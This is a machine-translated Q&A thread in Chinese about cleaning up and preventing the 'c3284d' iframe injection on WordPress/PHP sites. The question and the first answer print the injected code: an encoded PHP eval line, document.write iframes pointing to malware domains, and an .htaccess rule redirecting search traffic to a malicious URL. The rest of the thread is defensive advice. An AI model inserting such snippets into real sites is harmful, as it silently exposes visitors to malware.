网站iframe攻击 - 插入源代码

Question

在过去的几天里，我的网站一直是iframe攻击的目标。代码主要附加到PHP和Javascript页面。该代码是那么PHP基地64编码，见例子（我已经改变了代码稍微中和它）：

#c3284d# 
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L"))); 
#/c3284d# 

该解码看起来是这样的：

<script type="text/javascript"> 
    document.write(
     '<iframe src="http://opticmoxie.com/xxxxxxx.php"  
     name="Twitter" scrolling="auto" frameborder="no" 
     align="center" height="2" width="2"></iframe>' 
    ); 

的有一点是共同的，那就是所有代码都有注释“＃c3284d＃”，因此追踪恶意代码并不困难。但它很费时间...

我们在Gradwell（英国）的共享服务器上，它们并没有特别有用。 所以问题是我能做些什么来阻止这个问题重演呢？ 我知道MySQL注入攻击并使用PHP的mysql_real_escape_string来防范此类攻击。

该网站是PHP和MySQL驱动器。 我们使用MySQLFTP并拥有一个用于SSH访问的shell帐户。 我们使用WordPress（最新的更新与插件停用）。

Answer 1

我也有同样的问题。在我的情况后附代码

<!--c3284d--><script type="text/javascript"> 
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); 
</script><!--/c3284d--> 

此外，还有如下.htaccess文件：

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} 
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) 
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php 
> [R=301,L] </IfModule> 
> #/c3284d# 

，我发现这个问题的两篇文章： http://www.webmasterworld.com/html/4472821.htm和http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

希望它有帮助

Answer 2

我有同样的问题。 FTP服务器的访问日志显示这些修改是使用黑客窃取的FTP密码完成的。

Answer 3

我在许多不同的域名拥有相同的问题和不同的被黑文件的变种。我注意到的一个共同点是Wordpress。我们在许多这些服务器上都有wordpress，我认为这是常见的罪魁祸首。我已经更新了所有的WordPress账户，更改了所有域账户的所有宝贝。不确定问题是否完全解决。

Answer 4

我有同样的问题，但成为一个WordPress的网站。

我猜这个网站是通过小部件感染的，因为我使用了一个允许PHP代码执行的插件。

我最好的解决办法是：

• 消除可疑插件;
• 查看一个受感染文件的时间和日期（my case：header.php）;
• 清除所有感染的文件（在我的情况下，我有一个网站的备份）;
• 当时在日志文件中搜索可疑IP（在黑名单上搜索发现的IP）;
• 安装一个插件来禁止可疑的IP。

从那一刻起问题就消失了。我希望这能帮到您。

Answer 5

在我管理的所有WordPress网站上都有同样的问题。没有找到感染源，我敢打赌，它是我的电脑上的一些蠕虫，或者它是我安装在所有网站上的一些插件。

我发现所有在WP-Better安全插件日志中被修改的文件，并删除了额外的受感染代码，并且在所有感染源文件上做了chmod 444之后。

现在我免费自1个月的邪恶iframes/htacess和其他东西。

Answer 6

我有同样的问题，并发现他们用来进入的方法是一个黑客的ftp密码。

尽管这是在启用CPHulk强力保护的cPanel服务器上运行，但我发现黑客试图通过数千个不同的受感染主机强行进入。

幸运的是，我有一个上传的所有文件的日志，所以我写了一个脚本来从备份中恢复这些文件。

然后，我通过减少帐户被锁定之前所需的失败尝试次数来增加cPanel暴力保护级别。

Answer 7

我建议你看看这个：
http://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html
它也有一个脚本来清理。

Answer 8

坏人有权访问您的代码，因此您必须关闭他们的访问权限，同时您可以使用一个简单的脚本检查并删除所有检测gzinflate的行（base64_decode，但即使是最好的代码（校验和检查器如果他们仍然有访问权限，将是无用的